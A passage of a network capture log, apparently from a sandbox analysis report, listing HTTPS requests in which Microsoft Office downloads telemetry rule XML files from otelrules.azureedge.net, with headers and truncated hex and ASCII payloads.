                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:49:00 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:49:00 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1406
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                        ETag: "0x8DC582BEB16F27E"
                                                                                        x-ms-request-id: 5d2a7f3d-001e-0046-1b91-3fda4b000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114900Z-174f7845968j6t2phC1EWRcfe800000011e0000000009kbb
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:49:00 UTC1406INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        140192.168.2.44989013.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:49:00 UTC192OUTGET /rules/rule703000v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:49:00 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:49:00 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1369
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                        ETag: "0x8DC582BE32FE1A2"
                                                                                        x-ms-request-id: 7600cf19-d01e-007a-4135-41f38c000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114900Z-174f7845968j6t2phC1EWRcfe800000011g0000000007q3c
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:49:00 UTC1369INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        141192.168.2.44989113.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:49:00 UTC192OUTGET /rules/rule700751v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:49:00 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:49:00 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1414
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                        ETag: "0x8DC582BE03B051D"
                                                                                        x-ms-request-id: dbefca20-601e-00ab-55b4-4266f4000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114900Z-174f7845968qj8jrhC1EWRh41s00000011b0000000004z33
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:49:00 UTC1414INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        142192.168.2.44989413.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:49:02 UTC192OUTGET /rules/rule700150v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:49:02 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:49:02 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1362
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                        ETag: "0x8DC582BE54CA33F"
                                                                                        x-ms-request-id: 02365e0d-501e-0016-5daf-42181b000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114902Z-174f7845968glpgnhC1EWR7uec00000011g0000000007t65
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:49:02 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e 65 4e 6f 74 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOneNote" S="Medium" /> <F T="2">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        143192.168.2.44989213.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:49:02 UTC192OUTGET /rules/rule700750v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:49:02 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:49:02 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1377
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:02 GMT
                                                                                        ETag: "0x8DC582BEAFF0125"
                                                                                        x-ms-request-id: 49d32785-c01e-00a1-175b-3f7e4a000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114902Z-174f7845968kvnqxhC1EWRmf3g0000000n30000000008x2u
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:49:02 UTC1377INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 44 65 73 6b 74 6f 70 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookDesktop" S="Medium" />


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        144192.168.2.44989313.107.246.634436452C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:49:02 UTC192OUTGET /rules/rule700151v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:49:02 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:49:02 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1399
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                        ETag: "0x8DC582BE0A2434F"
                                                                                        x-ms-request-id: b5ebe77e-e01e-0051-390a-4184b2000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114902Z-174f7845968xlwnmhC1EWR0sv80000001150000000007waf
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:49:02 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOn


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        145192.168.2.44989513.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:49:02 UTC192OUTGET /rules/rule703451v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:49:03 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:49:02 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1409
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                        ETag: "0x8DC582BDFC438CF"
                                                                                        x-ms-request-id: f8ee177c-a01e-003d-4591-3f98d7000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114902Z-174f7845968nxc96hC1EWRspw80000001130000000007drr
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:49:03 UTC1409INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703451" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTo


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        146192.168.2.44989613.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:49:02 UTC192OUTGET /rules/rule703450v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:49:03 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:49:03 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1372
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                        ETag: "0x8DC582BE6669CA7"
                                                                                        x-ms-request-id: 3a535dae-901e-0067-22ec-41b5cb000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114903Z-174f7845968j6t2phC1EWRcfe800000011ng00000000110d
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:49:03 UTC1372INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703450" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOfficeMobile" S="Medium" /> <


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        147192.168.2.44989713.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:49:04 UTC192OUTGET /rules/rule700901v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:49:05 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:49:05 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1408
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                        ETag: "0x8DC582BE1038EF2"
                                                                                        x-ms-request-id: 1e770d35-001e-0082-170b-415880000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114905Z-174f7845968kdththC1EWRzvxn0000000ds0000000004wge
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:49:05 UTC1408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700901" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        148192.168.2.44989813.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:49:04 UTC192OUTGET /rules/rule700900v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:49:05 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:49:05 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1371
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:06 GMT
                                                                                        ETag: "0x8DC582BED3D048D"
                                                                                        x-ms-request-id: 5d24e825-001e-0046-608f-3fda4b000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114905Z-174f7845968kvnqxhC1EWRmf3g0000000n8g000000001xwm
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:49:05 UTC1371INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6f 66 69 6e 67 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700900" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProofing" S="Medium" /> <F


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        149192.168.2.44989913.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:49:04 UTC192OUTGET /rules/rule702251v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:49:05 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:49:05 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1389
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                        ETag: "0x8DC582BE0F427E7"
                                                                                        x-ms-request-id: 951ad049-201e-0085-3091-3f34e3000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114905Z-174f78459688l8rvhC1EWRtzr00000000e2g0000000014ea
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
